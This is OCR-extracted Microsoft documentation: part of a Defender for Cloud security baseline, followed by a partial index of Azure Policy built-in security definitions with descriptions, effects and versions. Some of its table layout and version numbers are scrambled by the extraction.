NS-1: Establish network segmentation boundaries 


Features 


Virtual Network Integration 


Description: Service supports deployment into customer's private Virtual Network 
(VNet). Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Identity management 


For more information, see the Microsoft cloud security benchmark: Identity management. 
IM-1: Use centralized identity and authentication system 
Features 


Azure AD Authentication Required for Data Plane Access 


Description: Service supports using Azure AD authentication for data plane access. 


Learn more. 
Supported Enabled By Default Configuration Responsibility 
True True Microsoft 


Configuration Guidance: No additional configurations are required as this is enabled on 
a default deployment. 


Local Authentication Methods for Data Plane Access 


Description: Local authentications methods supported for data plane access, such as a 


local username and password. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


IM-3: Manage application identities securely and 
automatically 


Features 


Managed Identities 


Description: Data plane actions support authentication using managed identities. Learn 


more. 
Supported Enabled By Default Configuration Responsibility 
True False Customer 


Configuration Guidance: Use Azure managed identities instead of service principals 
when possible, which can authenticate to Azure services and resources that support 
Azure Active Directory (Azure AD) authentication. Managed identity credentials are fully 
managed, rotated, and protected by the platform, avoiding hard-coded credentials in 
source code or configuration files. 


Reference: Roles used to automatically provision agents and extensions 


Service Principals 


Description: Data plane supports authentication using service principals. Learn more. 


Supported Enabled By Default Configuration Responsibility 
True False Customer 
Configuration Guidance: There is no current Microsoft guidance for this feature 


configuration. Please review and determine if your organization wants to configure this 


security feature. 


Reference: Roles used to automatically provision agents and extensions 
IM-7: Restrict resource access based on conditions 
Features 


Conditional Access for Data Plane 


Description: Data plane access can be controlled using Azure AD Conditional Access 


Policies. Learn more. 


Supported Enabled By Default Configuration Responsibility 


True False Customer 


Configuration Guidance: Define the applicable conditions and criteria for Azure Active 
Directory (Azure AD) conditional access in the workload. Consider common use cases 
such as blocking or granting access from specific locations, blocking risky sign-in 
behavior, or requiring organization-managed devices for specific applications. 


IM-8: Restrict the exposure of credential and secrets 


Features 


Service Credential and Secrets Support Integration and Storage in 
Azure Key Vault 


Description: Data plane supports native use of Azure Key Vault for credential and secrets 


store. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Privileged access 


For more information, see the Microsoft cloud security benchmark: Privileged access. 


PA-1: Separate and limit highly privileged/administrative 
users 


Features 


Local Admin Accounts 


Description: Service has the concept of a local administrative account. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


PA-7: Follow just enough administration (least privilege) 
principle 


Features 


Azure RBAC for Data Plane 


Description: Azure Role-Based Access Control (Azure RBAC) can be used to managed 


access to service's data plane actions. Learn more. 


Supported Enabled By Default Configuration Responsibility 


True False Customer 


Configuration Guidance: Defender for Cloud uses Azure role-based access control 
(Azure RBAC) to provide built-in roles. You can assign these roles to users, groups, and 
services in Azure to give users access to resources according to the access defined in the 
role. We recommend that you assign the least permissive role needed for users to 
complete their tasks. For example, assign the Reader role to users who only need to view 
information about the security health of a resource but not take action, such as applying 


recommendations or editing policies. 


Reference: Permissions in Microsoft Defender for Cloud 


PA-8: Determine access process for cloud provider 
support 


Features 


Customer Lockbox 


Description: Customer Lockbox can be used for Microsoft support access. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Data protection 


For more information, see the Microsoft cloud security benchmark: Data protection. 
DP-3: Encrypt sensitive data in transit 
Features 


Data in Transit Encryption 


Description: Service supports data in-transit encryption for data plane. Learn more. 


Supported Enabled By Default Configuration Responsibility 


True True Microsoft 


Configuration Guidance: No additional configurations are required as this is enabled on 
a default deployment. 


DP-4: Enable data at rest encryption by default 
Features 


Data at Rest Encryption Using Platform Keys 


Description: Data at-rest encryption using platform keys is supported, any customer 
content at rest is encrypted with these Microsoft managed keys. Learn more. 


Supported Enabled By Default Configuration Responsibility 


True True Microsoft 


Configuration Guidance: No additional configurations are required as this is enabled on 
a default deployment. 


DP-5: Use customer-managed key option in data at rest 
encryption when required 


Features 


Data at Rest Encryption Using CMK 


Description: Data at-rest encryption using customer-managed keys is supported for 
customer content stored by the service. Learn more. 


Supported Enabled By Default Configuration Responsibility 


True False Customer 


Configuration Guidance: Microsoft Defender for Cloud uses a configured Log Analytics 
workspace to store the data, alerts, and recommendations it generates. Configure a 
customer-managed key (CMK) for the workspace you use for Microsoft Defender for 
Cloud data collection. A CMK encrypts all data saved or sent to the workspace with an 
Azure Key Vault key that you create and own. 


Reference: Azure Monitor customer-managed key 
DP-6: Use a secure key management process 
Features 


Key Management in Azure Key Vault 


Description: The service supports Azure Key Vault integration for any customer keys, 


secrets, or certificates. Learn more. 


Supported Enabled By Default Configuration Responsibility 


True False Customer 


Configuration Guidance: Microsoft Defender for Cloud uses a configured Log Analytics 
workspace to store the data, alerts, and recommendations it generates. Configure a 
customer-managed key (CMK) for the workspace you use for Microsoft Defender for 
Cloud data collection. A CMK encrypts all data saved or sent to the workspace with an 
Azure Key Vault key that you create and own. 


Reference: Azure Monitor customer-managed key 
DP-7: Use a secure certificate management process 
Features 


Certificate Management in Azure Key Vault 


Description: The service supports Azure Key Vault integration for any customer 


certificates. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Asset management 


For more information, see the Microsoft cloud security benchmark: Asset management. 
AM-2: Use only approved services 
Features 


Azure Policy Support 


Description: Service configurations can be monitored and enforced via Azure Policy. 


Learn more. 


Supported Enabled By Default Configuration Responsibility 


True False Customer 


Configuration Guidance: Use Microsoft Defender for Cloud to configure Azure Policy to 
audit and enforce configurations of your Azure resources. Use Azure Monitor to create 
alerts when there is a configuration deviation detected on the resources. Use Azure 
Policy [deny] and [deploy if not exists] effects to enforce secure configuration across 
Azure resources. 


Logging and threat detection 


For more information, see the Microsoft cloud security benchmark: Logging and threat 
detection. 


LT-4: Enable logging for security investigation 


Features 


Azure Resource Logs 


Description: Service produces resource logs that can provide enhanced service-specific 
metrics and logging. The customer can configure these resource logs and send them to 
their own data sink like a storage account or log analytics workspace. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Backup and recovery 


For more information, see the Microsoft cloud security benchmark: Backup and recovery. 
BR-1: Ensure regular automated backups 


Features 


Azure Backup 


Description: The service can be backed up by the Azure Backup service. Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Service Native Backup Capability 


Description: Service supports its own native backup capability (if not using Azure 
Backup). Learn more. 


Supported Enabled By Default Configuration Responsibility 


False Not Applicable Not Applicable 


Configuration Guidance: This feature is not supported to secure this service. 


Next steps 


e See the Microsoft cloud security benchmark overview 
e Learn more about Azure security baselines 


Azure Policy built-in definitions for Microsoft 
Defender for Cloud 
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This page is an index of Azure Policy built-in policy definitions related to Microsoft Defender for Cloud. The 
following groupings of policy definitions are available: 


e The initiatives group lists the Azure Policy initiative definitions in the "Defender for Cloud" category. 

e The default initiative group lists all the Azure Policy definitions that are part of Defender for Cloud's 
default initiative, Microsoft cloud security benchmark. This Microsoft-authored, widely respected 
benchmark builds on controls from the Center for Internet Security (CIS) and the National Institute 
of Standards and Technology (NIST) Z with a focus on cloud-centric security. 

e The category group lists all the Azure Policy definitions in the "Defender for Cloud" category. 


For more information about security policies, see Working with security policies. For other Azure Policy 
built-ins for other services, see Azure Policy built-in definitions. 


The name of each built-in policy definition links to the policy definition in the Azure portal. Use the link in 
the Version column to view the source on the Azure Policy GitHub repo £. 


Microsoft Defender for Cloud initiatives 


To learn about the built-in initiatives that are monitored by Defender for Cloud, see the following table: 


Name Description Policies Version 
[Preview]: Configure Configure machines to automatically install the Azure Monitor and Azure 13 1.0.1- 
machines to create Security agents. Microsoft Defender for Cloud collects events from the preview 
the default Microsoft agents and uses them to provide security alerts and tailored hardening 

Defender for Cloud tasks (recommendations). Create a resource group, a Data Collection Rule 

pipeline using Azure and Log Analytics workspace in the same region as the machine to store 

Monitor Agent £ audit records. Target machines must be in a supported location. 

[Preview]: Configure Configure machines to automatically install the Azure Monitor and Azure 13 1.0.1- 
machines to create Security agents. Microsoft Defender for Cloud collects events from the preview 
the user-defined agents and uses them to provide security alerts and tailored hardening 

Microsoft Defender tasks (recommendations). Use the user-provided Log Analytics workspace 

for Cloud pipeline to store audit records. Creates a resource group and a Data Collection 

using Azure Monitor Rule in the same region as the user-provided Log Analytics workspace. 

Agent č Target machines must be in a supported location. 

[Preview]: Configure Microsoft Defender for SQL collects events from the agents and uses them 9 1.2.0- 
SQL VMs and Arc- to provide security alerts and tailored hardening tasks (recommendations). preview 
enabled SQL Servers Creates a resource group and a Data Collection Rule and Log Analytics 

to install Microsoft workspace in the same region as the machine. 

Defender for SQL and 

AMA with a LA 


workspace Si 


[Preview]: Configure Microsoft Defender for SQL collects events from the agents and uses them 8 1.1.0- 
SQL VMs and Arc- to provide security alerts and tailored hardening tasks (recommendations). preview 
enabled SQL Servers Creates a resource group and a Data Collection Rule in the same region as 

to install Microsoft the user-defined Log Analytics workspace. 


Name 


Defender for SQL and 
AMA with a user- 
defined LA 
workspace & 


[Preview]: Deploy 
Microsoft Defender 
for Endpoint agent 7 


Configure Advanced 
Threat Protection to 
be enabled on open- 
source relational 
databases 7 


Configure Azure 
Defender to be 
enabled on SQL 
Servers and SQL 
Managed Instances Z 


Configure Microsoft 
Defender for 
Databases to be 
enabled 7 


Microsoft cloud 
security benchmark Z 


Description Policies 
Deploy Microsoft Defender for Endpoint agent on applicable images. 4 
Enable Advanced Threat Protection on your non-Basic tier open-source 3 


relational databases to detect anomalous activities indicating unusual and 


potentially harmful attempts to access or exploit databases. See 


https://aka.ms/AzDforOpenSourceDBsDocu & . 


Enable Azure Defender on your SQL Servers and SQL Managed Instances 3 
to detect anomalous activities indicating unusual and potentially harmful 


attempts to access or exploit databases. 


Configure Microsoft Defender for Databases to protect your Azure SQL 4 
Databases, Managed Instances, Open-source relational databases and 


Cosmos DB. 


The Microsoft cloud security benchmark initiative represents the policies 


235 


and controls implementing security recommendations defined in 
Microsoft cloud security benchmark, see https://aka.ms/azsecbm ©. This 
also serves as the Microsoft Defender for Cloud default policy initiative. 


You can directly assign this initiative, or manage its policies and 


compliance results within Microsoft Defender for Cloud. 


Version 


1.0.0- 
preview 


1.0.1 


3.0.0 


1.0.0 


57.23.1 


Defender for Cloud's default initiative (Microsoft cloud 
security benchmark) 


To learn about the built-in policies that are monitored by Defender for Cloud, see the following table: 


Policy name 


(Azure portal) 


[Preview]: All Internet 
traffic should be 
routed via your 
deployed Azure 
Firewall 2 


[Preview]: API 
endpoints in Azure 
API Management 
should be 
authenticated 7 


Description 


Azure Security Center has identified that some of your 
subnets aren't protected with a next generation firewall. 
Protect your subnets from potential threats by restricting 
access to them with Azure Firewall or a supported next 
generation firewall 


API endpoints published within Azure API Management 


should enforce authentication to help minimize security risk. 


Authentication mechanisms are sometimes implemented 
incorrectly or are missing. This allows attackers to exploit 
implementation flaws and to access data. Learn More about 
the OWASP API Threat for Broken User Authentication here: 
https://learn.microsoft.com/azure/api- 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


3.0.0- 
preview E 


1.0.0- 
preview E 


Policy name 


(Azure portal) 


[Preview]: API 
endpoints that are 
unused should be 
disabled and removed 
from the Azure API 
Management service £ 


[Preview]: Azure Arc 
enabled Kubernetes 
clusters should have 
Microsoft Defender 
for Cloud extension 
installed 7 


[Preview]: Certificates 
should have the 
specified maximum 
validity period £ 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Linux 
virtual machines Z 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Linux 
virtual machines scale 
sets? 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Windows 
virtual machines z 


[Preview]: Guest 
Attestation extension 
should be installed on 
supported Windows 
virtual machines scale 
sets 2 


[Preview]: Linux virtual 
machines should 
enable Azure Disk 


Description 


management/mitigate-owasp-api-threats#broken-user- 
authentication 


As a security best practice, API endpoints that haven't 
received traffic for 30 days are considered unused and 
should be removed from the Azure API Management service. 
Keeping unused API endpoints may pose a security risk to 
your organization. These may be APIs that should have been 
deprecated from the Azure API Management service but may 
have been accidentally left active. Such APIs typically do not 
receive the most up to date security coverage. 


Microsoft Defender for Cloud extension for Azure Arc 
provides threat protection for your Arc enabled Kubernetes 
clusters. The extension collects data from all nodes in the 
cluster and sends it to the Azure Defender for Kubernetes 
backend in the cloud for further analysis. Learn more in 
https://docs.microsoft.com/azure/defender-for- 
cloud/defender-for-containers-enable?pivots=defender-for- 
container-arc. 


Manage your organizational compliance requirements by 
specifying the maximum amount of time that a certificate 
can be valid within your key vault. 


Install Guest Attestation extension on supported Linux virtual 
machines to allow Azure Security Center to proactively attest 
and monitor the boot integrity. Once installed, boot integrity 
will be attested via Remote Attestation. This assessment 
applies to Trusted Launch and Confidential Linux virtual 
machines. 


Install Guest Attestation extension on supported Linux virtual 
machines scale sets to allow Azure Security Center to 
proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Linux virtual machine scale sets. 


Install Guest Attestation extension on supported virtual 
machines to allow Azure Security Center to proactively attest 
and monitor the boot integrity. Once installed, boot integrity 
will be attested via Remote Attestation. This assessment 
applies to Trusted Launch and Confidential Windows virtual 
machines. 


Install Guest Attestation extension on supported virtual 
machines scale sets to allow Azure Security Center to 
proactively attest and monitor the boot integrity. Once 
installed, boot integrity will be attested via Remote 
Attestation. This assessment applies to Trusted Launch and 
Confidential Windows virtual machine scale sets. 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys; temp disks 
and data caches aren't encrypted, and data isn't encrypted 
when flowing between compute and storage resources. Use 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


1.0.0- 
preview E 


6.0.0- 
preview E 


220- 
preview E 


6.0.0- 
preview E 


5.1.0- 
preview E 


4.0.0- 
preview E 


3, 1.0= 
preview E 


1.1.0- 
preview E 


Policy name 


(Azure portal) 


Encryption or 
EncryptionAtHost. ¢ 


[Preview]: Linux virtual 
machines should use 
only signed and 
trusted boot 
components E 


[Preview]: Log 
Analytics extension 
should be installed on 
your Linux Azure Arc 
machines E 


[Preview]: Log 
Analytics extension 
should be installed on 
your Windows Azure 
Arc machines E 


[Preview]: Microsoft 
Defender for APIs 
should be enabled 7 


[Preview]: Network 
traffic data collection 
agent should be 
installed on Linux 
virtual machines 7 


[Preview]: Network 
traffic data collection 
agent should be 
installed on Windows 
virtual machines 7 


[Preview]: Secure Boot 
should be enabled on 
supported Windows 
virtual machines 7 


[Preview]: Storage 
account public access 
should be disallowed 7 


[Preview]: System 
updates should be 
installed on your 


Description 


Azure Disk Encryption or EncryptionAtHost to encrypt all this 
data.Visit https://aka.ms/diskencryptioncomparison E to 
compare encryption offerings. This policy requires two 


prerequisites to be deployed to the policy assignment scope. 


For details, visit https://aka.ms/gcpol £. 


All OS boot components (boot loader, kernel, kernel drivers) 
must be signed by trusted publishers. Defender for Cloud 
has identified untrusted OS boot components on one or 
more of your Linux machines. To protect your machines from 
potentially malicious components, add them to your allow 
list or remove the identified components. 


This policy audits Linux Azure Arc machines if the Log 
Analytics extension is not installed. 


This policy audits Windows Azure Arc machines if the Log 
Analytics extension is not installed. 


Microsoft Defender for APIs brings new discovery, 
protection, detection, & response coverage to monitor for 
common API based attacks & security misconfigurations. 


Security Center uses the Microsoft Dependency agent to 
collect network traffic data from your Azure virtual machines 
to enable advanced network protection features such as 
traffic visualization on the network map, network hardening 
recommendations and specific network threats. 


Security Center uses the Microsoft Dependency agent to 
collect network traffic data from your Azure virtual machines 
to enable advanced network protection features such as 
traffic visualization on the network map, network hardening 
recommendations and specific network threats. 


Enable Secure Boot on supported Windows virtual machines 
to mitigate against malicious and unauthorized changes to 
the boot chain. Once enabled, only trusted bootloaders, 
kernel and kernel drivers will be allowed to run. This 
assessment applies to Trusted Launch and Confidential 
Windows virtual machines. 


Anonymous public read access to containers and blobs in 
Azure Storage is a convenient way to share data but might 
present security risks. To prevent data breaches caused by 
undesired anonymous access, Microsoft recommends 
preventing public access to a storage account unless your 
scenario requires it. 


Your machines are missing system, security, and critical 
updates. Software updates often include critical patches to 
security holes. Such holes are frequently exploited in 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


1.0.0- 
preview E 


1.0.1 = 
preview E 


1.0.1- 
preview E 


1.00;2- 
preview E 


10:2- 
preview E 


babe 
preview E 


4.0.0- 
preview E 


3:1.0- 
preview E 


1.0.0- 
preview E 


Policy name 


(Azure portal) 


machines (powered 
by Update Center) £ 


[Preview]: vTPM 
should be enabled on 
supported virtual 
machines E 


[Preview]: Windows 
virtual machines 
should enable Azure 
Disk Encryption or 
EncryptionAtHost. SZ 


A maximum of 3 
owners should be 
designated for your 
subscription £ 


A vulnerability 
assessment solution 
should be enabled on 
your virtual machines Z 


Accounts with owner 
permissions on Azure 
resources should be 
MFA enabled Z 


Accounts with read 
permissions on Azure 
resources should be 
MFA enabled # 


Accounts with write 
permissions on Azure 
resources should be 
MFA enabled Z 


Adaptive application 
controls for defining 
safe applications 
should be enabled on 
your machines Z 


Adaptive network 
hardening 


Description 


malware attacks so it's vital to keep your software updated. 
To install all outstanding patches and secure your machines, 
follow the remediation steps. 


Enable virtual TPM device on supported virtual machines to 
facilitate Measured Boot and other OS security features that 
require a TPM. Once enabled, vTPM can be used to attest 
boot integrity. This assessment only applies to trusted launch 
enabled virtual machines. 


By default, a virtual machine's OS and data disks are 
encrypted-at-rest using platform-managed keys; temp disks 
and data caches aren't encrypted, and data isn't encrypted 
when flowing between compute and storage resources. Use 
Azure Disk Encryption or EncryptionAtHost to encrypt all this 
data.Visit https://aka.ms/diskencryptioncomparison E to 
compare encryption offerings. This policy requires two 
prerequisites to be deployed to the policy assignment scope. 
For details, visit https://aka.ms/gcpol £. 


It is recommended to designate up to 3 subscription owners 
in order to reduce the potential for breach by a 
compromised owner. 


Audits virtual machines to detect whether they are running a 
supported vulnerability assessment solution. A core 
component of every cyber risk and security program is the 
identification and analysis of vulnerabilities. Azure Security 
Center's standard pricing tier includes vulnerability scanning 
for your virtual machines at no extra cost. Additionally, 
Security Center can automatically deploy this tool for you. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with owner permissions to prevent a 
breach of accounts or resources. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with read privileges to prevent a 
breach of accounts or resources. 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with write privileges to prevent a 
breach of accounts or resources. 


Enable application controls to define the list of known-safe 
applications running on your machines, and alert you when 
other applications run. This helps harden your machines 
against malware. To simplify the process of configuring and 
maintaining your rules, Security Center uses machine 
learning to analyze the applications running on each 
machine and suggest the list of known-safe applications. 


Azure Security Center analyzes the traffic patterns of Internet 
facing virtual machines and provides Network Security Group 


Effect(s) 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


2.0.0- 
preview E 


1.1.0- 


preview E 


3.0.0 2 


3.0.0 7 


1.0.0 4 


1.0.07 


1.0.0 2 


3.0.02 


30.02 


Policy name 


(Azure portal) 


recommendations 
should be applied on 
internet facing virtual 
machines E 


All network ports 
should be restricted 
on network security 
groups associated to 
your virtual machine Z 


Allowlist rules in your 
adaptive application 
control policy should 
be updated 7 


An Azure Active 
Directory 
administrator should 
be provisioned for 
MySQL servers E 


An Azure Active 
Directory 
administrator should 
be provisioned for 
PostgreSQL servers E 


An Azure Active 
Directory 
administrator should 
be provisioned for 
SQL servers E 


API Management APIs 
should use only 
encrypted protocols 7 


API Management calls 
to API backends 
should be 
authenticated 7 


API Management calls 
to API backends 
should not bypass 
certificate thumbprint 
or name validation Si 


API Management 
direct management 
endpoint should not 
be enabled 7 


Description 


rule recommendations that reduce the potential attack 
surface 


Azure Security Center has identified some of your network 
security groups’ inbound rules to be too permissive. Inbound 
rules should not allow access from ‘Any’ or ‘Internet’ ranges. 
This can potentially enable attackers to target your resources. 


Monitor for changes in behavior on groups of machines 
configured for auditing by Azure Security Center's adaptive 
application controls. Security Center uses machine learning 
to analyze the running processes on your machines and 
suggest a list of known-safe applications. These are 
presented as recommended apps to allow in adaptive 
application control policies. 


Audit provisioning of an Azure Active Directory administrator 
for your MySQL server to enable Azure AD authentication. 
Azure AD authentication enables simplified permission 
management and centralized identity management of 
database users and other Microsoft services 


Audit provisioning of an Azure Active Directory administrator 
for your PostgreSQL server to enable Azure AD 
authentication. Azure AD authentication enables simplified 
permission management and centralized identity 
management of database users and other Microsoft services 


Audit provisioning of an Azure Active Directory administrator 
for your SQL server to enable Azure AD authentication. Azure 
AD authentication enables simplified permission 
management and centralized identity management of 
database users and other Microsoft services 


To ensure security of data in transit, APIs should be available 
only through encrypted protocols, like HTTPS or WSS. Avoid 
using unsecured protocols, such as HTTP or WS. 


Calls from API Management to backends should use some 
form of authentication, whether via certificates or credentials. 
Does not apply to Service Fabric backends. 


To improve the API security, API Management should 
validate the backend server certificate for all API calls. Enable 
SSL certificate thumbprint and name validation. 


The direct management REST API in Azure API Management 
bypasses Azure Resource Manager role-based access control, 
authorization, and throttling mechanisms, thus increasing the 
vulnerability of your service. 


Effect(s) 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled, Deny 


Audit, Disabled, Deny 


Audit, Disabled, Deny 


Audit, Disabled, Deny 


Version 


(GitHub) 


3.0.0 7 


3.0.0 Z 


1.1.07 


1.0.0 4 


1.0.0 4 


20:2 2 


10.12 


1.0.2 2 


IZE 


Policy name 


(Azure portal) 


API Management 
minimum API version 
should be set to 
2019-12-01 or higher £ 


API Management 
secret named values 
should be stored in 
Azure Key Vault Z 


API Management 
services should use a 
virtual network £ 


API Management 
should disable public 
network access to the 
service configuration 
endpoints £ 


API Management 
subscriptions should 
not be scoped to all 
APIs Z 


App Configuration 
should use private 
link Z 


App Service apps 
should have ‘Client 
Certificates (Incoming 
client certificates)’ 
enabled 7 


App Service apps 
should have remote 


debugging turned off Z 


App Service apps 
should have resource 
logs enabled Z 


Description 


To prevent service secrets from being shared with read-only 
users, the minimum API version should be set to 2019-12-01 
or higher. 


Named values are a collection of name and value pairs in 
each API Management service. Secret values can be stored 
either as encrypted text in API Management (custom secrets) 
or by referencing secrets in Azure Key Vault. To improve 
security of API Management and secrets, reference secret 
named values from Azure Key Vault. Azure Key Vault 
supports granular access management and secret rotation 
policies. 


Azure Virtual Network deployment provides enhanced 
security, isolation and allows you to place your API 
Management service in a non-internet routable network that 
you control access to. These networks can then be connected 
to your on-premises networks using various VPN 
technologies, which enables access to your backend services 
within the network and/or on-premises. The developer portal 
and API gateway, can be configured to be accessible either 
from the Internet or only within the virtual network. 


To improve the security of API Management services, restrict 
connectivity to service configuration endpoints, like direct 
access management API, Git configuration management 
endpoint, or self-hosted gateways configuration endpoint. 


API Management subscriptions should be scoped to a 
product or an individual API instead of all APIs, which could 
result in an excessive data exposure. 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The private link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
your app configuration instances instead of the entire 
service, you'll also be protected against data leakage risks. 
Learn more at: https://aka.ms/appconfig/private-endpoint £2 . 


Client certificates allow for the app to request a certificate for 
incoming requests. Only clients that have a valid certificate 
will be able to reach the app. 


Remote debugging requires inbound ports to be opened on 
an App Service app. Remote debugging should be turned 
off. 


Audit enabling of resource logs on the app. This enables you 
to recreate activity trails for investigation purposes if a 
security incident occurs or your network is compromised. 


Effect(s) 


Audit, Deny, Disabled 


Audit, Disabled, Deny 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled, Deny 


AuditlfNotExists, Disabled 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


LOTE 


1022 


1.0.24 


MOT 


1.1.02 


1026 


3.0.0 £ 


2.0.0 2 


2.0.12 


Policy name 


(Azure portal) 


App Service apps 
should not have CORS 
configured to allow 
every resource to 
access your apps £ 


App Service apps 
should only be 


accessible over HTTPS ¢ 


App Service apps 
should require FTPS 
only Z 


App Service apps 
should use managed 
identity 7 


App Service apps 
should use the latest 
TLS version E 


Audit usage of 
custom RBAC roles E 


Auditing on SQL 
server should be 
enabled Z 


Authentication to 
Linux machines 
should require SSH 
keys E 


Authorized IP ranges 
should be defined on 
Kubernetes Services č 


Auto provisioning of 
the Log Analytics 
agent should be 
enabled on your 
subscription E 


Description Effect(s) Version 


(GitHub) 


Cross-Origin Resource Sharing (CORS) should not allow all AuditlfNotExists, Disabled 2.0.0 7 
domains to access your app. Allow only required domains to 


interact with your app. 


Use of HTTPS ensures server/service authentication and 40.07 


protects data in transit from network layer eavesdropping 


Audit, Disabled, Deny 


attacks. 


Enable FTPS enforcement for enhanced security. AuditlfNotExists, Disabled 3.0.0 Z 


Use a managed identity for enhanced authentication security AuditlfNotExists, Disabled 3.0.0 Z 


Periodically, newer versions are released for TLS either due to AuditlfNotExists, Disabled 2.0.1 Z 
security flaws, include additional functionality, and enhance 

speed. Upgrade to the latest TLS version for App Service 

apps to take advantage of security fixes, if any, and/or new 


functionalities of the latest version. 


Audit built-in roles such as ‘Owner, Contributer, Reader' 1.0.12 
instead of custom RBAC roles, which are error prone. Using 
custom roles is treated as an exception and requires a 


rigorous review and threat modeling 


Audit, Disabled 


Auditing on your SQL Server should be enabled to track AuditlfNotExists, Disabled 2.0.0 Z 
database activities across all databases on the server and 


save them in an audit log. 


Although SSH itself provides an encrypted connection, using 3.1.07 
passwords with SSH still leaves the VM vulnerable to brute- 


force attacks. The most secure option for authenticating to 


AuditlfNotExists, Disabled 


an Azure Linux virtual machine over SSH is with a public- 
private key pair, also known as SSH keys. Learn more: 
https://docs.microsoft.com/azure/virtual- 
machines/linux/create-ssh-keys-detailed. 


Restrict access to the Kubernetes Service Management API Audit, Disabled 2.0.1 4 
by granting API access only to IP addresses in specific 

ranges. It is recommended to limit access to authorized IP 

ranges to ensure that only applications from allowed 


networks can access the cluster. 


To monitor for security vulnerabilities and threats, Azure AuditlfNotExists, Disabled 1.0.17 
Security Center collects data from your Azure virtual 

machines. Data is collected by the Log Analytics agent, 

formerly known as the Microsoft Monitoring Agent (MMA), 

which reads various security-related configurations and event 

logs from the machine and copies the data to your Log 

Analytics workspace for analysis. We recommend enabling 

auto provisioning to automatically deploy the agent to all 


supported Azure VMs and any new ones that are created. 


Policy name 


(Azure portal) 


Automation account 
variables should be 
encrypted £ 


Azure Arc enabled 
Kubernetes clusters 
should have the Azure 
Policy extension 
installed Z 


Azure Backup should 
be enabled for Virtual 
Machines E 


Azure Cache for Redis 
should use private 
link Z 


Azure Cosmos DB 
accounts should have 
firewall rules Z 


Azure Cosmos DB 
accounts should use 
customer-managed 
keys to encrypt data 
at rest £ 


Azure Cosmos DB 
should disable public 
network access E 


Azure Databricks 
Clusters should 
disable public IP Z 


Azure Databricks 
Workspaces should 


be in a virtual network E 


Description Effect(s) 


It is important to enable encryption of Automation account Audit, Deny, Disabled 


variable assets when storing sensitive data 


The Azure Policy extension for Azure Arc provides at-scale AuditlfNotExists, Disabled 
enforcements and safeguards on your Arc enabled 
Kubernetes clusters in a centralized, consistent manner. Learn 


more at https://aka.ms/akspolicydoc £Z . 


Ensure protection of your Azure Virtual Machines by AuditlfNotExists, Disabled 
enabling Azure Backup. Azure Backup is a secure and cost 


effective data protection solution for Azure. 


Private endpoints lets you connect your virtual network to AuditlfNotExists, Disabled 
Azure services without a public IP address at the source or 

destination. By mapping private endpoints to your Azure 

Cache for Redis instances, data leakage risks are reduced. 

Learn more at: https://docs.microsoft.com/azure/azure- 


cache-for-redis/cache-private-link. 


Firewall rules should be defined on your Azure Cosmos DB 
accounts to prevent traffic from unauthorized sources. 
Accounts that have at least one IP rule defined with the 
virtual network filter enabled are deemed compliant. 
Accounts disabling public access are also deemed compliant. 


Audit, Deny, Disabled 


Use customer-managed keys to manage the encryption at 
rest of your Azure Cosmos DB. By default, the data is 
encrypted at rest with service-managed keys, but customer- 
managed keys are commonly required to meet regulatory 
compliance standards. Customer-managed keys enable the 
data to be encrypted with an Azure Key Vault key created 
and owned by you. You have full control and responsibility 
for the key lifecycle, including rotation and management. 
Learn more at https://aka.ms/cosmosdb-cmk Z. 


audit, Audit, deny, Deny, 
disabled, Disabled 


Disabling public network access improves security by 
ensuring that your CosmosDB account isn't exposed on the 
public internet. Creating private endpoints can limit exposure 
of your CosmosDB account. Learn more at: 
https://docs.microsoft.com/azure/cosmos-db/how-to- 
configure-private-endpoints#blocking-public-network- 


